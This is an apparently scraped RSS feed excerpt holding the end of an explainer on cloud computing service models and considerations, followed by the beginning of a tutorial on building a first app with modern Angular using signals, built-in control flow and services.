<p class="wp-block-paragraph">This type of cloud computing delivers applications over the internet, typically with a browser-based user interface. Today, most software companies offer their wares via <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">SaaS </a>— if not exclusively, then at least as an option.</p>



<p class="wp-block-paragraph">The most popular SaaS applications for business are <a href="https://www.computerworld.com/article/3570821/google-workspace-explained-googles-answer-to-microsoft-365.html">Google’s G Suite</a> and <a href="https://www.computerworld.com/article/1710782/office-2021-vs-microsoft-365-office-365-how-to-choose.html">Microsoft’s Office 365</a>. Most enterprise applications, including giant <a href="https://www.cio.com/article/272362/what-is-erp-key-features-of-top-enterprise-resource-planning-systems.html">ERP</a> suites from Oracle and SAP, come in both SaaS and on-premises versions. SaaS applications typically offer extensive configuration options as well as development environments that enable customers to code their own modifications and additions. They also enable data integration with on-prem applications.</p>



<h3 class="wp-block-heading"><strong>IaaS (infrastructure as a service) definition</strong></h3>



<p class="wp-block-paragraph">At a basic level, <a href="https://www.infoworld.com/article/2255598/what-is-iaas-your-data-center-in-the-cloud.html">IaaS </a>cloud providers offer virtualized compute, storage, and networking over the internet on a pay-per-use basis. Think of it as a data center maintained by someone else, remotely, but with a software layer that virtualizes all those resources and automates customers’ ability to allocate them with little trouble.</p>



<p class="wp-block-paragraph">But that’s just the basics. The full array of services offered by the major public IaaS providers is staggering: <a href="https://www.infoworld.com/article/2269279/the-era-of-the-cloud-database-has-finally-begun.html">highly scalable databases</a>, virtual private networks, <a href="https://www.infoworld.com/article/2255434/what-is-big-data-analytics-fast-answers-from-diverse-data-sets.html">big data analytics</a>, <a href="https://www.infoworld.com/article/2259367/buyers-guide-how-to-choose-a-cloud-machine-learning-platform.html">AI and machine learning services</a>, application platforms, developer tools, <a href="https://www.infoworld.com/article/3215275/what-is-devops-transforming-software-development.html">devops</a> tools, and so on. Amazon Web Services was the first IaaS provider and remains the leader, followed by <a href="https://www.infoworld.com/article/2269424/azure-cloud-services-guide-the-right-tools-for-the-job.html">Microsoft Azure</a>, <a href="https://www.infoworld.com/article/2263677/google-cloud-platform-services-guide-the-right-tools-for-the-job.html">Google Cloud Platform</a>, <a href="https://www.infoworld.com/article/2256709/ibm-cloud-services-guide-the-right-tools-for-the-job.html">IBM Cloud</a>, and <a href="https://www.infoworld.com/article/3529339/oracle-cloudworld-2024-10-key-takeaways-from-the-big-annual-event.html">Oracle Cloud</a>.</p>



<h3 class="wp-block-heading"><strong>PaaS (platform as a service) definition</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2256066/what-is-paas-platform-as-a-service-a-simpler-way-to-build-software-applications.html">PaaS</a> provides sets of services and workflows that specifically target developers, who can use shared tools, processes, and APIs to accelerate the development, testing, and deployment of applications. Salesforce’s <a href="https://www.infoworld.com/article/2257217/5-foolish-reasons-youre-not-using-heroku.html">Heroku</a> and Salesforce Platform (formerly Force.com) are popular public cloud PaaS offerings; <a href="https://www.infoworld.com/article/2258957/cloud-foundry-stages-a-comeback.html">Cloud Foundry</a> and Red Hat’s <a href="https://www.infoworld.com/article/2261552/red-hat-openshift-adds-containers-and-microservices-features-for-developers.html">OpenShift</a> can be deployed on premises or accessed through the major public clouds. For enterprises, PaaS can ensure that developers have ready access to resources, follow certain processes, and use only a specific array of services, while operators maintain the underlying infrastructure.</p>



<h3 class="wp-block-heading"><strong>FaaS (function as a service) definition</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2256402/paas-caas-or-faas-how-to-choose.html">FaaS</a>, the original and most basic version of <a href="https://www.infoworld.com/article/2266283/serverless-in-the-cloud-aws-vs-google-cloud-vs-microsoft-azure.html">serverless computing</a>, adds another layer of abstraction to PaaS, so that developers are insulated from everything in the stack below their code. Instead of futzing with virtual servers, containers, and application runtimes, developers upload narrowly functional blocks of code, and set them to be triggered by a certain event (such as a form submission or uploaded file). All of the major clouds offer FaaS on top of IaaS: <a href="https://www.infoworld.com/article/2265897/aws-lambda-tutorial-get-started-with-serverless-computing-2.html">AWS Lambda</a>, <a href="https://www.infoworld.com/article/2255377/how-to-work-with-azure-functions-in-csharp.html">Azure Functions</a>, <a href="https://www.infoworld.com/article/2243861/google-takes-aims-at-aws-lambda-with-cloud-functions.html">Google Cloud Functions</a>, and IBM Cloud Functions. A special benefit of FaaS applications is that they consume no IaaS resources until an event occurs, reducing pay-per-use fees.</p>



<h3 class="wp-block-heading"><strong>Private cloud definition</strong></h3>



<p class="wp-block-paragraph">A <a href="https://www.infoworld.com/article/2179737/build-your-own-private-cloud-2.html">private cloud</a> downsizes the technologies used to run IaaS public clouds into software that can be deployed and operated in a customer’s data center. As with a public cloud, internal customers can provision their own virtual resources to build, test, and run applications, with metering to charge back departments for resource consumption. For administrators, the private cloud amounts to the ultimate in data center automation, minimizing manual provisioning and management.</p>



<p class="wp-block-paragraph">VMware remains a force in the private cloud software market, but the acquisition by Broadcom has created confusion and raised concerns among some customers about potential changes in pricing, licensing, and support. This could lead some organizations to explore alternative solutions.</p>



<p class="wp-block-paragraph">OpenStack continues to be a popular open-source choice for building private clouds. It offers a flexible and customizable platform that can be tailored to specific needs. However, OpenStack can be complex to deploy and manage, and it may require significant expertise to maintain.</p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/3268073/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a>, a container orchestration platform that has gained significant traction in recent years, is often used in conjunction with other technologies like OpenStack to build <a href="https://www.infoworld.com/article/3281046/what-is-cloud-native-the-modern-way-to-develop-software.html">cloud-native</a> applications. Red Hat OpenShift is a comprehensive cloud platform based on Kubernetes that provides a managed experience for deploying and managing <a href="https://www.infoworld.com/article/3310941/why-you-should-use-docker-and-containers.html">container</a>-based, applications.</p>



<p class="wp-block-paragraph">Many cloud providers offer their own cloud-native platforms and tools, such as <a href="https://www.networkworld.com/article/968169/aws-rolls-out-outposts-for-on-premises-hybrid-cloud.html">AWS Outposts</a>, <a href="https://www.infoworld.com/article/2253985/a-cloud-in-your-datacenter-microsoft-azure-stack-arrives.html">Azure Stack</a>, and <a href="https://www.infoworld.com/article/2257617/what-is-google-cloud-anthos-managed-kubernetes-everywhere.html">Google Cloud Anthos</a>.</p>



<p class="wp-block-paragraph">Common factors to consider when evaluating private cloud platforms include the following:</p>



<ol class="wp-block-list">
<li><strong>Pricing</strong>: The initial cost of deployment and ongoing maintenance costs.</li>



<li><strong>Complexity</strong>: The level of technical expertise needed to manage the platform.</li>



<li><strong>Flexibility</strong>: The ability to customize the platform to meet specific needs.</li>



<li><strong>Vendor lock-in</strong>: The degree to which the organization is tied to a particular vendor.</li>



<li><strong>Security</strong>: The security features and capabilities of the platform.</li>



<li><strong>Scalability</strong>: The capability to expand the platform to meet future needs.</li>
</ol>



<h3 class="wp-block-heading"><strong>Hybrid cloud definition</strong></h3>



<p class="wp-block-paragraph">A <a href="https://www.infoworld.com/article/2257084/hybrid-cloud-private-cloud-public-cloud-multicloud-how-to-choose.html">hybrid cloud</a> is the integration of a private cloud with a public cloud. At its most developed, the hybrid cloud involves creating parallel environments in which applications can move easily between private and public clouds. In other instances, databases may stay in the customer data center and integrate with public cloud applications — or virtualized data center workloads may be replicated to the cloud during times of peak demand. The types of integrations between private and public clouds vary widely, but they must be extensive to earn a hybrid cloud designation.</p>



<h3 class="wp-block-heading"><strong>Public APIs (application programming interfaces) definition</strong></h3>



<p class="wp-block-paragraph">Just as SaaS delivers applications to users over the internet, public <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">APIs</a> offer developers application functionality that can be accessed programmatically. For example, in building web applications, developers often tap into the Google Maps API to provide driving directions; to integrate with social media, developers may call upon APIs maintained by Twitter, Facebook, or LinkedIn. <a href="https://www.infoworld.com/article/2253662/get-started-with-twilios-programmable-video-api.html">Twilio</a> has built a successful business delivering telephony and messaging services via public APIs. Ultimately, any business can provision its own public APIs to enable customers to consume data or access application functionality.</p>



<h3 class="wp-block-heading"><strong>iPaaS (integration platform as a service) definition</strong></h3>



<p class="wp-block-paragraph">Data integration is a key issue for any sizeable company, but particularly for those that adopt SaaS at scale. iPaaS providers typically offer prebuilt connectors for sharing data among popular SaaS applications and on-premises enterprise applications, though providers may focus more or less on business-to-business and e-commerce integrations, cloud integrations, or traditional SOA-style integrations. iPaaS offerings in the cloud from such providers as Dell Boomi, Informatica, MuleSoft, and SnapLogic also let users implement data mapping, transformations, and workflows as part of the integration-building process.</p>



<h3 class="wp-block-heading"><strong>IDaaS (identity as a service) definition</strong></h3>



<p class="wp-block-paragraph">The most difficult security issue related to <a href="https://www.infoworld.com/article/2268884/why-cloud-computing-is-always-a-good-question.html">cloud computing</a> is managing user identity and its associated rights and permissions across data centers and pubic cloud sites. <a href="https://www.csoonline.com/article/572759/idaas-explained-how-it-compares-to-iam.html">IDaaS providers</a> maintain cloud-based user profiles that authenticate users and enable access to resources or applications based on security policies, user groups, and individual privileges. The ability to integrate with various directory services (Active Directory, LDAP, etc.) and provide single sign-on across business-oriented SaaS applications is essential.</p>



<p class="wp-block-paragraph">Leaders in IDaaS include Microsoft, IBM, Google, Oracle, Okta, Capgemini, Okta, Junio Corporation, OneLogin, and JumpCloud. <strong> </strong></p>



<h3 class="wp-block-heading"><strong>Collaboration platforms</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/3595255/slack-adds-templates-to-help-users-kick-off-projects-quicker.html">Collaboration solutions such as Slack</a> and <a href="https://www.computerworld.com/article/3593909/microsoft-combines-teams-chat-and-channels-in-ui-refresh.html">Microsoft Teams</a> have become vital messaging platforms that enable groups to communicate and work together effectively. Basically, these solutions are relatively simple SaaS applications that support chat-style messaging along with file sharing and audio or video communication. Most offer APIs to facilitate integrations with other systems and enable third-party developers to create and share add-ins that augment functionality.</p>



<h3 class="wp-block-heading"><strong>Vertical clouds</strong></h3>



<p class="wp-block-paragraph">Key providers in such industries as financial services, healthcare, retail, life sciences, and manufacturing provide PaaS clouds to enable customers to build vertical applications that tap into industry-specific, API-accessible services. Vertical clouds can dramatically reduce the time to market for vertical applications and accelerate domain-specific B2B integrations. Most vertical clouds are built with the intent of nurturing partner ecosystems.</p>



<h2 class="wp-block-heading"><strong>Other cloud computing considerations</strong></h2>



<p class="wp-block-paragraph">The most widely accepted definition of cloud computing means that you run your workloads on someone else’s servers, but this is not the same as outsourcing. Virtual cloud resources and even SaaS applications must be configured and maintained by the customer. Consider these factors when planning a cloud initiative.</p>



<h3 class="wp-block-heading"><strong>Cloud computing security considerations</strong></h3>



<p class="wp-block-paragraph">Objections to the public cloud generally begin with <a href="https://www.csoonline.com/article/555213/top-cloud-security-threats.html">cloud security</a>, although the major public clouds have proven themselves much less susceptible to attack than the average enterprise data center.</p>



<p class="wp-block-paragraph">Of greater concern is the integration of security policy and identity management between customers and public cloud providers. In addition, government regulation may forbid customers from allowing sensitive data off-premises. Other concerns include the risk of outages and the long-term operational costs of public cloud services.</p>



<h3 class="wp-block-heading"><strong>Multicloud management considerations</strong></h3>



<p class="wp-block-paragraph">To enhance their operational efficiency, reduce costs, and improve security, many companies are increasingly turning to <a href="https://www.infoworld.com/article/2335587/can-cloud-computing-be-truly-federated.html">multicloud strategies</a>. By distributing workloads across <a href="https://www.infoworld.com/article/2336303/are-the-different-public-clouds-really-that-different.html">multiple cloud providers</a>, organizations can avoid vendor lock-in, <a href="https://www.infoworld.com/article/2261783/3-cloud-architecture-patterns-that-optimize-scalability-and-cost.html">optimize costs</a>, and leverage the best-of-breed services offered by different providers.</p>



<p class="wp-block-paragraph">This multicloud approach also improves performance and reliability by minimizing downtime and optimizing latency. Additionally, multicloud strategies strengthen security by diversifying the attack surface and facilitating compliance with industry regulations. Finally, by replicating critical workloads across multiple regions and providers, companies can establish robust disaster recovery and business continuity plans, ensuring minimal disruption in the event of catastrophic failures.</p>



<p class="wp-block-paragraph">The bar to qualify as a <a href="https://www.infoworld.com/article/2256706/what-is-multicloud-the-next-step-in-cloud-computing.html">multicloud</a> adopter is low: A customer just needs to use more than one public cloud service. However, depending on the number and variety of cloud services involved, managing multiple clouds can become complex from both a cost optimization and a technology perspective.</p>



<p class="wp-block-paragraph">In some cases, customers subscribe to multiple cloud services simply to avoid dependence on a single provider. A more sophisticated approach is to select public clouds based on the unique services they offer and, in some cases, integrate them. For example, developers might want to use Google’s <a href="https://www.infoworld.com/article/2336686/google-vertex-ai-studio-puts-the-promise-in-generative-ai.html">Vertex AI Studio</a> on Google Cloud Platform to build AI-driven applications, but prefer <a href="https://www.infoworld.com/article/2260091/what-is-jenkins-the-ci-server-explained.html">Jenkins</a> hosted on the CloudBees platform for <a href="https://www.infoworld.com/article/3271126/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">continuous integration</a>.</p>



<p class="wp-block-paragraph">To control costs and reduce management overhead, some customers opt for <a href="https://www.infoworld.com/article/3520828/how-cloud-custodian-conquered-cloud-resource-management.html">cloud management platforms</a> (CMPs) and/or cloud service brokers (CSBs), which let you manage multiple clouds as if they were one cloud. The problem is that these solutions tend to limit customers to such common-denominator services as storage and compute, ignoring the panoply of services that make each cloud unique.</p>



<h3 class="wp-block-heading"><strong>Edge computing considerations</strong></h3>



<p class="wp-block-paragraph">You often see <a href="https://www.networkworld.com/article/964305/what-is-edge-computing-and-how-it-s-changing-the-network.html">edge computing</a> incorrectly described as an alternative to cloud computing. Edge computing is about moving compute to local devices in a highly distributed system, typically as a layer around a cloud computing core. There is typically a cloud involved to orchestrate all of the devices and take in their data, then analyze it or otherwise act on it. </p>



<h3 class="wp-block-heading"><strong>To the cloud and back – why repatriation is real</strong></h3>



<p class="wp-block-paragraph">While public cloud offers scalability and flexibility, some enterprises are opting to <a href="https://www.infoworld.com/article/2336102/why-companies-are-leaving-the-cloud.html">return to on-premises infrastructure</a> due to rising costs, data security concerns, performance issues, vendor lock-in, and regulatory compliance challenges. While the public cloud offers scalability and flexibility, on-premises infrastructure provides greater control, customization, and potential cost savings in certain scenarios leading some technology decision-makers to <a href="https://www.infoworld.com/article/2336835/do-you-need-to-repatriate-from-the-cloud.html">consider repatriation</a>. However, a hybrid cloud approach, combining public and private cloud, often offers the best balance of benefits.</p>



<p class="wp-block-paragraph">More specific reasons to repatriate including the following:</p>



<ul class="wp-block-list">
<li>Unanticipated costs, such as data transfer fees, storage charges, and <a href="https://www.infoworld.com/article/2336430/why-public-cloud-providers-are-cutting-egress-fees.html">egress fees</a>, can quickly escalate, especially for large-scale cloud deployments.  </li>



<li>Inaccurate resource provisioning or underutilization can lead to higher-than-expected costs.</li>



<li>Stricter <a href="https://www.infoworld.com/article/3545268/why-cloud-security-outranks-cost-and-scalability.html">data privacy regulations</a> require organizations to store and process data within specific geographic boundaries.  </li>



<li>For highly sensitive data, companies may prefer to maintain greater control over security measures and access permissions. </li>



<li><a href="https://www.infoworld.com/article/2338856/cloud-may-be-overpriced-compared-to-on-premises-systems.html">On-premises infrastructure</a> can offer lower latency, particularly for applications requiring real-time processing or high-performance computing.  </li>



<li>Overreliance on a single cloud provider can limit flexibility and increase costs. Repatriation allows organizations to diversify their infrastructure and reduce vendor dependency.  </li>



<li>Industries with stringent compliance requirements may find it easier to meet standards with on-premises infrastructure.  </li>



<li>On-premises environments offer greater control over hardware, software, and network configurations, allowing for customized solutions.  </li>
</ul>



<h2 class="wp-block-heading"><strong>Benefits of cloud computing</strong></h2>



<p class="wp-block-paragraph">The cloud’s main appeal is to reduce the time to market of applications that need to scale dynamically. Increasingly, however, developers are drawn to the cloud by the abundance of advanced new services that can be incorporated into applications, from machine learning to internet of things (IoT) connectivity.</p>



<p class="wp-block-paragraph">Although businesses sometimes migrate legacy applications to the cloud to reduce data center resource requirements, the real benefits accrue to new applications that take advantage of cloud services and “cloud native” attributes. The latter include <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices architecture</a>, <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Linux containers</a> to enhance application portability, and container management solutions such as <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a> that orchestrate container-based services. <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html">Cloud-native</a> approaches and solutions can be part of either public or private clouds and help enable highly efficient <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">devops</a> workflows.</p>



<p class="wp-block-paragraph">Cloud computing, be it public or private or hybrid or multicloud, has become the platform of choice for large applications, particularly customer-facing ones that need to change frequently or scale dynamically. More significantly, the major public clouds now lead the way in enterprise technology development, debuting new advances before they appear anywhere else. Workload by workload, enterprises are opting for the cloud, where an endless parade of exciting new technologies invite innovative use.</p>



<p class="wp-block-paragraph">SaaS has its roots in the ASP (application service provider) trend of the early 2000s, when providers would run applications for business customers in the provider’s data center, with dedicated instances for each customer. The ASP model was a spectacular failure because it quickly became impossible for providers to maintain so many separate instances, particularly as customers demanded customizations and updates.</p>



<p class="wp-block-paragraph">Salesforce is widely considered the first company to launch a highly successful SaaS application using <a href="https://www.infoworld.com/article/2335534/the-evolution-of-multitenancy-for-cloud-computing.html">multitenancy</a> — a defining characteristic of the SaaS model. Rather than each Salesforce customer getting its own application instance, customers who subscribe to the company’s salesforce automation software share a single, large, dynamically scaled instance of an application (like tenants sharing an apartment building), while storing their data in separate, secure repositories on the SaaS provider’s servers. Fixes can be rolled out behind the scenes with zero downtime and customers can receive UX or functionality improvements as they become available.</p>



<p class="wp-block-paragraph"></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Get started with Angular: Introducing the modern reactive workflow]]></title>
<description><![CDATA[Angular is a cohesive, all-in-one reactive framework for web development. It is one of the larger reactive frameworks, focused on being a single architectural system that handles all your web development needs under one idiom. While Angular was long criticized for being heavyweight as compared to...]]></description>
<link>https://tsecurity.de/de/3665664/ai-nachrichten/get-started-with-angular-introducing-the-modern-reactive-workflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665664/ai-nachrichten/get-started-with-angular-introducing-the-modern-reactive-workflow/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Angular is a cohesive, all-in-one <a href="https://www.infoworld.com/article/3962039/what-you-need-to-know-about-angular-react-vue-and-svelte-popular-javascript-frameworks-compared.html">reactive framework</a> for web development. It is one of the larger reactive frameworks, focused on being a single architectural system that handles all your web development needs under one idiom. While Angular was long criticized for being heavyweight as compared to <a href="https://www.infoworld.com/article/2253289/react-tutorial-get-started-with-the-reactjs-javascript-library.html">React</a>, many of those issues <a href="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html">were addressed in Angular 19</a>. Modern Angular is built around the <a href="https://blog.angular-university.io/angular-signals">Signals API</a> and minimal formality, while still delivering a one-stop-shop that includes dependency injection and integrated routing.</p>



<p class="wp-block-paragraph">Angular is popular with the enterprise because of its stable, curated nature, but it is becoming more attractive to the wider developer community thanks to its more <a href="https://www.infoworld.com/article/3802707/angular-team-unveils-strategy-for-2025.html">community engaged development philosophy</a>. That, along with its recent technical evolution, make Angular one of the most interesting projects to watch right now.</p>



<h2 class="wp-block-heading">Why choose Angular?</h2>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2336227/whats-the-best-javascript-framework.html">Choosing a JavaScript development framework</a> sometimes feels like a philosophical debate, but it should be a practical decision. Angular is unique because it is strongly opinionated. It doesn’t just give you a view layer; it provides a complete toolkit for building web applications.</p>



<p class="wp-block-paragraph">Like other reactive frameworks, Angular is built around its reactive engine, which lets you bind state (variables) to the view. But if that’s all you needed, one of the smaller, more focused frameworks would be more than enough. What Angular has that some of these other frameworks don’t is its ability to use data binding to automatically synchronize data from your user interface (UI) with your JavaScript objects. Angular also leverages dependency injection and inversion of control to help structure your application and make it easier to test. And it contains more advanced features like server-side rendering (SSR) and static-site generation (SSG) within itself, rather than requiring you to engage a <a href="https://www.infoworld.com/article/3831686/plug-and-play-web-development-with-astro-js.html">meta-framework</a> for either style of development.</p>



<p class="wp-block-paragraph">While Angular might not be your top choice for every occasion, it’s an excellent option for larger projects that require features you won’t get with a more lightweight framework.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html" data-type="link" data-id="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html">Catching up with Angular 19</a>.</strong></p>



<h2 class="wp-block-heading">Getting started with Angular</h2>



<p class="wp-block-paragraph">With those concepts in mind, let’s set up Angular in your development environment. After that, we can run through developing a web application with Angular. To start, make sure you have Node and NPM installed. From the command line, enter:</p>



<pre class="wp-block-code"><code>$ node -v
$ npm -v</code></pre>



<p class="wp-block-paragraph">Next, you can use the Angular CLI to launch a new app:</p>



<pre class="wp-block-code"><code>$ ng new iw-ng</code></pre>



<p class="wp-block-paragraph">You can use the defaults in your responses to the interactive prompts shown here:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/angular1.png?w=1024" alt="A screenshot of a new project setup in the Angular command-line interface." class="wp-image-4123771" width="1024" height="413" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">We now have a basic project layout in the new directory, which you can import into an IDE (such as <a href="https://www.infoworld.com/article/2254808/get-started-with-visual-studio-code.html" data-type="link" data-id="https://www.infoworld.com/article/2254808/get-started-with-visual-studio-code.html">VS Code</a>) or edit directly.</p>



<p class="wp-block-paragraph">Looking at the project layout, you might notice it is fairly lean, a break from Angular projects of the past. The most important parts are:</p>



<ul class="wp-block-list">
<li><code>src/main.ts</code>: This is the main entry point. In older versions of Angular, this file had to bootstrap a module, which then bootstrapped a component. Now, it avoids any verbose syntax, calling bootstrapApplication with your root component directly.</li>



<li><code>src/index.html</code>: The main HTML page that hosts your application. This is the standard index.html that serves all root requests in a web page and contains the  tag where your Angular component will render. It is the “body” that the “spirit” of your code animates.</li>



<li><code>src/app/app.ts</code>: The root component of your application. This single file defines the view logic and the component metadata. In the new “standalone” world, it manages its own imports, meaning you can see exactly what dependencies it uses right at the top of the file. (This is the <code></code> root element that appears in <code>src/index.html</code>.)</li>



<li><code>src/app/app.config.ts</code>: This file is new in modern Angular and replaces the old A<code>ppModule providers</code> array. It is where you configure global services, like the router or HTTP client.</li>



<li><code>angular.json</code>: The configuration file for the CLI itself. It tells the build tools how to process your code, though you will rarely need to touch this file manually anymore.</li>
</ul>



<p class="wp-block-paragraph">Here is the basic flow of how the engine renders these components:</p>



<ol start="1" class="wp-block-list">
<li><strong>The arrival (HTML)</strong>: The browser receives <code>index.html</code>. The <code></code> tag is there, but it’s empty.</li>



<li><strong>The unpacking (JavaScript)</strong>: The browser sees the <code></code> tags at the bottom of the HTML and downloads the JavaScript bundles (your compiled code) from <code>src/app/app.ts</code>.</li>



<li><strong>The assembly (Bootstrap)</strong>: The browser runs that JavaScript. The code “wakes up,” finds the <code></code> tag in the DOM, and dynamically inserts your title, buttons, and lists.</li>
</ol>



<p class="wp-block-paragraph">This flow will be different if you are using server-side rendering (SSR), but we’ll leave that option aside for now. Now that you’ve seen the basic architecture, let’s get into the code.</p>



<h2 class="wp-block-heading">Developing your first web app in Angular</h2>



<p class="wp-block-paragraph">If you open <code>src/app/app.ts</code> (more info <a href="http://app.ts/">here</a>) the component definition looks like this:</p>



<pre class="wp-block-code"><code>import { Component, signal } from '@angular/core';
import { RouterOutlet } from '@angular/router';

@Component({
  selector: 'app-root',
  imports: [RouterOutlet],
  templateUrl: './app.html',
  styleUrl: './app.css'
})
export class App {
  protected readonly title = signal('iw-ng');
}</code></pre>



<p class="wp-block-paragraph">Before we dissect the code, let’s run the app and see what it produces:</p>



<pre class="wp-block-code"><code>$ ng serve</code></pre>



<p class="wp-block-paragraph">You should see a page like this one at <code>localhost:4200</code>:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/angular2.png?w=1024" alt="A screenshot of a Hello, World! app built with Angular." class="wp-image-4123772" width="1024" height="585" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">Returning to the <code>src/app.ts</code> component, notice that there are three main parts of the definition: the class, the metadata, and the view. Let’s unpack these separately.</p>



<h3 class="wp-block-heading">The class (export class App)</h3>



<p class="wp-block-paragraph">Export class <code>App</code> is vanilla TypeScript that holds your component’s data and logic. In our example, <code>title = signal(‘iw-ng’)</code> defines a piece of reactive state. Unlike older versions of Angular where data was just a plain property, here we use a <a href="https://www.solidjs.com/tutorial/introduction_signals">signal</a>. Signals are wrappers around values that notify the template precisely when they change, enabling fine-grained performance.</p>



<h3 class="wp-block-heading">The metadata (@Component)</h3>



<p class="wp-block-paragraph">The <code>@Component</code> decorator tells Angular it is dealing with a component, not just a generic class. There are several elements involved in the decorator’s communication with the engine:</p>



<ul class="wp-block-list">
<li><code>selector: 'app-root'</code>: Defines the custom HTML tag associated with any given component. Angular finds <code></code> in your <code>index.html</code> and renders the component there.</li>



<li><code>imports</code>: In the new Angular era, dependencies are explicit. You list exactly what a component needs (like <code>RouterOutlet</code> or other components) here, rather than hiding them in a separate module file.</li>



<li><code>templateUrl</code>: Points to the external HTML file that defines the view.</li>
</ul>



<h3 class="wp-block-heading">The view (the template)</h3>



<p class="wp-block-paragraph">This is the visual part of the component, defined in <code>app.html</code>. It combines standard HTML with Angular’s template syntax. (JSX handles this part for React-based apps.)</p>



<p class="wp-block-paragraph">We can modify <code>src/app/app.html</code> to see how these three elements work together. To start, delete the default content and add the following:</p>



<pre class="wp-block-code"><code><h1>Hello, {{ title() }}</h1>
</code></pre>



<p class="wp-block-paragraph">The double curly braces <code>{{ }}</code> are called <a href="https://angular.dev/guide/templates/binding">interpolation</a>. Notice the parentheses in <code>title()</code>. We are reading the “title” signal value by calling its function. If you were to update that signal programmatically (e.g., <code>this.title.set('New Value')</code>), the text on the screen would update instantly.</p>



<h2 class="wp-block-heading">Angular’s built-in control flow</h2>



<p class="wp-block-paragraph">Old-school Angular required “structural directives” like <code>*ngIf</code> and <code>*ngFor</code> logic control. These were powerful but required importing <code>CommonModule</code> and learning a specific micro-syntax. Modern Angular uses a built-in control flow that looks like standard JavaScript (similar to other Reactive platforms).</p>



<p class="wp-block-paragraph">To see the new control flow in action, let’s add a list to our component. Update <code>src/app/app.ts</code> as follows, leaving the rest of the file the same:</p>



<pre class="wp-block-code"><code>export class App {
  protected readonly title = signal('iw-ng');
  protected readonly frameworks = signal(['Angular', 'React', 'Vue', 'Svelte']);
  protected showList = signal(true);

  toggleList() {
    this.showList.update(v =&gt; !v);
  }
}</code></pre>



<p class="wp-block-paragraph">While we’re at it, let’s also update <code>src/app/app.html</code> to render this new list (don’t worry about <code></code> for now; it just tells Angular where to render the framing template):</p>



<pre class="wp-block-code"><code><button>Toggle List</button>

@if (showList()) {
  <ul>
    @for (tech of frameworks(); track tech) {
      <li>{{ tech }}</li>
    }
  </ul>
} @else {
  <p>List is hidden</p>
}

</code></pre>



<p class="wp-block-paragraph">The app will now display a list that can be toggled for visibility:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/angular3.png?w=1024" alt="Screenshot of a list that can be toggled on and off for visibility." class="wp-image-4123773" width="1024" height="585" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">This syntax is cleaner and easier to read than the old <code>*ngFor</code> loops:</p>



<ul class="wp-block-list">
<li><code>@if</code> conditionally renders the block if the signal’s value is true.</li>



<li><code>@for</code> iterates over the array. The track keyword is required for performance (it tells Angular how to identify unique items in the list).</li>



<li><code>(click)</code> is an <a href="https://angular.dev/guide/templates/event-listeners">event binding</a>. It lets us run code (the <code>toggleList</code> method) when the user interacts with the button.</li>
</ul>



<h2 class="wp-block-heading">Services: Managing business logic in Angular</h2>



<p class="wp-block-paragraph">Components focus on the view (i.e., what you see). For the business logic that backs the application functionality, we use services.</p>



<p class="wp-block-paragraph">A service is just a class that can be “injected” into a component that needs it. This is Angular’s famous dependency injection system. It allows you to write logic once and reuse it anywhere. It’s a slightly different way of thinking about how an application is wired together, but it gives you real organizational benefits over time.</p>



<p class="wp-block-paragraph">To generate a service, you can use the CLI:</p>



<pre class="wp-block-code"><code>$ ng generate service frameworks</code></pre>



<p class="wp-block-paragraph">This command creates a <code>src/app/hero.ts</code> file. In modern Angular, we define services using the <code>@Injectable</code> decorator. Currently, the <code>src/app/hero.ts</code> file just has this:</p>



<pre class="wp-block-code"><code>import { Injectable } from '@angular/core';

@Injectable({
  providedIn: 'root',
})
export class Frameworks {
  
}</code></pre>



<p class="wp-block-paragraph">Open the file and add a simple method to return our data:</p>



<pre class="wp-block-code"><code>import { Injectable } from '@angular/core';

@Injectable({
  providedIn: 'root', // Available everywhere in the app
})
export class Frameworks {
  getList() {
    return ['Angular', 'React', 'Vue', 'Svelte'];
  }
}</code></pre>



